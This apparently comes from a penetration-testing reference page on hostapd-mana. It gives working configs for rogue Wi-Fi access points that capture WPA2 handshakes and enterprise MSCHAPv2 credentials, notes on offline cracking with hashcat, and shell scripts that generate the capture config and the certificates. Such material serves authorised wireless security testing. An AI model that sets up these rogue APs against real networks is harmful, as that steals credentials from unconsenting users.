Overview

hostapd-mana is a patched build of hostapd from SensePost that adds rogue access point capabilities. As a WPA2-PSK rogue AP it captures handshake material from clients that try to join a saved network by name (including networks that are not in range, since it can answer client probe requests): the rogue AP does not know the real PSK, so what it captures is the client's MIC over the first two EAPOL messages, which is enough for an offline dictionary attack. As a WPA Enterprise rogue AP it runs hostapd's built-in EAP server as a rogue 802.1X authenticator and logs the MSCHAPv2 challenge/response pairs of clients that authenticate to it.

Install

# From package
sudo apt install hostapd-mana

# From source
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd && make && sudo make install

Usage

sudo hostapd-mana <config.conf>

Config: WPA2 PSK Handshake Capture

Captures handshakes from clients probing for a WPA2 network that is not currently in range. Set ssid to the exact name the client has saved; wpa_passphrase is a placeholder and is not expected to match. hostapd.conf:

interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

When hostapd-mana logs AP-STA-POSSIBLE-PSK-MISMATCH, a client has answered with a MIC computed from its real PSK and the handshake has been written to the mana_wpaout file. Stop with CTRL+C and crack the .hccapx offline (hashcat mode 2500 on releases that still accept hccapx input; newer releases expect the file converted to the 22000 format).
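As an added example (not hostapd-mana's own code and not part of this page's original config), the following shell script writes the PSK-capture config above from parameters and derives hw_mode from the channel, since a channel outside the band selected by hw_mode makes hostapd refuse to start. The helper names, the 1-14 (hw_mode=g) and 36-165 (hw_mode=a) channel ranges, and the placement of the hccapx file next to the config are the script's own assumptions; regulatory-domain restrictions are not checked.

```sh
#!/bin/sh
# Added example, not hostapd-mana's own code. Writes a PSK-capture config in
# the shape shown above and checks the channel against the band.
set -eu

# Hypothetical helper: map a channel to the hostapd hw_mode that serves it.
# Assumed ranges: 2.4 GHz channels 1-14 -> g, 5 GHz channels 36-165 -> a.
hw_mode_for_channel() {
  ch="$1"
  case "$ch" in
    ''|*[!0-9]*) return 1 ;;          # not a number
  esac
  if [ "$ch" -ge 1 ] && [ "$ch" -le 14 ]; then
    echo g
  elif [ "$ch" -ge 36 ] && [ "$ch" -le 165 ]; then
    echo a
  else
    return 1
  fi
}

# write_psk_capture_conf IFACE SSID CHANNEL OUTFILE
# The hccapx output is placed next to OUTFILE (hostapd.conf -> hostapd.hccapx).
write_psk_capture_conf() {
  iface="$1"; ssid="$2"; ch="$3"; out="$4"
  mode=$(hw_mode_for_channel "$ch") || {
    echo "unsupported channel: $ch" >&2; return 1; }
  # 802.11 allows 1-32 bytes; character length is close enough for ASCII names
  [ "${#ssid}" -ge 1 ] && [ "${#ssid}" -le 32 ] || {
    echo "SSID must be 1-32 characters" >&2; return 1; }
  cat >"$out" <<EOF
interface=$iface
driver=nl80211
hw_mode=$mode
channel=$ch
ssid=$ssid
mana_wpaout=${out%.conf}.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
# placeholder passphrase: it will not match, the client's MIC is the prize
wpa_passphrase=12345678
EOF
}

# usage: sh gen_psk_conf.sh wlan1 "TARGET-SSID" 6 /tmp/hostapd.conf
if [ "$#" -eq 4 ]; then
  write_psk_capture_conf "$@" && echo "wrote $4"
fi
```

Run it with the four arguments, then start hostapd-mana on the generated file; a 5 GHz channel such as 36 automatically switches the config to hw_mode=a.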

Config: WPA Enterprise Credential Capture

Runs hostapd's built-in EAP server (eap_server=1) as a rogue 802.1X authenticator, so no external RADIUS server is involved; the FreeRADIUS package is only used to produce the CA and server certificate the TLS tunnel needs (see the FreeRADIUS section below). Clients that perform PEAP or TTLS against it leak their MSCHAPv2 challenge/response, which is cracked offline. A supplicant that validates the server certificate will refuse the tunnel unless the user accepts the warning, so capture depends on lax client configuration. Note hw_mode=a here: <CHANNEL> must be a 5 GHz channel (use hw_mode=g for channels 1-14). network.conf:

ssid=<TARGET-SSID>
interface=<MANAGED-INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1

EAP user file (/etc/hostapd-mana/mana.eap_user):

*    PEAP,TTLS,TLS,FAST
"t"  TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "pass"  [2]

The first line offers the outer (phase 1) methods to any identity. The second line, marked [2], is the phase 2 entry for the methods tunnelled inside PEAP/TTLS; the identity and password on it are placeholders that only need to exist so the inner method is offered, since the goal is the client's MSCHAPv2 challenge/response rather than a successful login.

Key Config Options

Option                  Description
mana_wpe=1              Enable WPE (credential capture)
mana_credout=<file>     Path to write captured credentials
mana_eapsuccess=1       Send EAP-Success to keep the client connected after capture
mana_eaptls=1           Enable EAP-TLS capture
mana_wpaout=<file>      Write WPA handshakes to an hccapx file

FreeRADIUS Certificate Generation

Required for the WPA Enterprise rogue AP. The FreeRADIUS package ships a certs Makefile that builds a CA, a server certificate and DH parameters; only those files are used, the radiusd service itself is never started:

sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf       # set CA details (country, org, CN)
nano server.cnf   # set server details
rm dh
make

The generated server.key is encrypted with the passphrase set in server.cnf (input_password, which defaults to whatever), and that is the value private_key_passwd= in the rogue AP config must match. Removing dh forces make to regenerate the DH parameters, which can take several minutes.
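The rogue AP config above names a CA certificate, a server certificate and a passphrase-protected private key, and the most common reason hostapd-mana fails to start in Enterprise mode is that those three do not agree with each other. As an added example (not hostapd-mana's or FreeRADIUS's own code), the following script builds a throwaway CA and server certificate with openssl in the same file layout, then checks that the passphrase decrypts the key, that server.pem and server.key carry the same public key, and that server.pem chains to ca.pem. The subject names, the KEY_PASS variable and the helper names are the script's own assumptions; it does not generate the dh file, which is taken from the FreeRADIUS make output.

```sh
#!/bin/sh
# Added example, not hostapd-mana's or FreeRADIUS's own code. Builds a
# throwaway CA and server certificate with openssl in the file layout the
# enterprise config expects, and checks the three things that stop
# hostapd-mana from loading them: key passphrase, cert/key match, CA chain.
set -eu

KEY_PASS="${KEY_PASS:-whatever}"   # FreeRADIUS's default input_password

# make_test_certs DIR : writes ca.pem, server.pem and an encrypted server.key
make_test_certs() {
  dir="$1"
  mkdir -p "$dir"
  # self-signed CA (subject is made up for the example)
  openssl req -x509 -newkey rsa:2048 -nodes -days 3650 \
    -subj "/C=ZA/O=Example Corp/CN=Example Corp CA" \
    -keyout "$dir/ca.key" -out "$dir/ca.pem" 2>/dev/null
  # server key encrypted with the passphrase private_key_passwd= must supply
  openssl genrsa -aes256 -passout "pass:$KEY_PASS" -out "$dir/server.key" 2048 2>/dev/null
  openssl req -new -key "$dir/server.key" -passin "pass:$KEY_PASS" \
    -subj "/C=ZA/O=Example Corp/CN=radius.example.corp" \
    -out "$dir/server.csr" 2>/dev/null
  openssl x509 -req -in "$dir/server.csr" -CA "$dir/ca.pem" -CAkey "$dir/ca.key" \
    -CAcreateserial -days 730 -out "$dir/server.pem" 2>/dev/null
}

# check_eap_certs DIR PASSPHRASE : prints "ok" and returns 0, or a reason and 1
check_eap_certs() {
  dir="$1"; pass="$2"
  # 1. private_key_passwd must decrypt the key
  openssl rsa -in "$dir/server.key" -passin "pass:$pass" -noout 2>/dev/null \
    || { echo "passphrase does not decrypt server.key"; return 1; }
  # 2. server_cert and private_key must carry the same public key
  kpub=$(openssl rsa -in "$dir/server.key" -passin "pass:$pass" -pubout 2>/dev/null \
         | openssl dgst -sha256)
  cpub=$(openssl x509 -in "$dir/server.pem" -noout -pubkey | openssl dgst -sha256)
  [ "$kpub" = "$cpub" ] || { echo "server.pem does not match server.key"; return 1; }
  # 3. server_cert must chain to ca_cert, or validating supplicants will bail
  openssl verify -CAfile "$dir/ca.pem" "$dir/server.pem" >/dev/null 2>&1 \
    || { echo "server.pem is not signed by ca.pem"; return 1; }
  echo ok
}

# usage: sh mana_certs.sh /tmp/mana-certs
if [ "$#" -eq 1 ]; then
  make_test_certs "$1" && check_eap_certs "$1" "$KEY_PASS"
fi
```

The check_eap_certs function is the useful part on a real engagement: point it at /etc/freeradius/3.0/certs with the passphrase you put in private_key_passwd= before starting hostapd-mana, and the error message tells you which of the three files to fix.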